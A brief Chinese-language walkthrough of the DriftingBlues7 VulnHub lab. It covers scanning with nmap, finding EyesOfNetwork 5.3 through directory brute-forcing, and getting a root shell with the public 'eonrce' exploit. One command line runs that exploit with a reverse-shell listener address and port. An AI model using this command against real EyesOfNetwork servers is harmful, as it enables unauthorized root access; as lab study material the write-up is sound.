一、介绍
运行环境:Virtualbox
攻击机:kali(10.0.2.15)
靶机:driftingblues7(10.0.2.23)
目标:获取靶机root权限和flag
靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/
二、信息收集
使用nmap主机发现靶机ip:10.0.2.23
使用nmap端口扫描发现靶机开放端口:22、80、111、443、3306、8086
访问网站发现访问80端口会跳转到443端口,443端口安装的网站为EyesOfNetwork
使用dirsearch爆破目录,发现/bower.json
,可以看到EyesOfNetwork
的版本为5.3
找了一圈没发现其他信息,尝试找找EyesOfNetwork是否有历史漏洞可以利用。发现一个exp:https://github.com/h4knet/eonrce
三、漏洞利用
将该exp下载下来,执行利用,直接获取到root权限的shell
python eonrce.py https://10.0.2.23/ -ip 10.0.2.15 -port 4444
获取flag,只有一个flag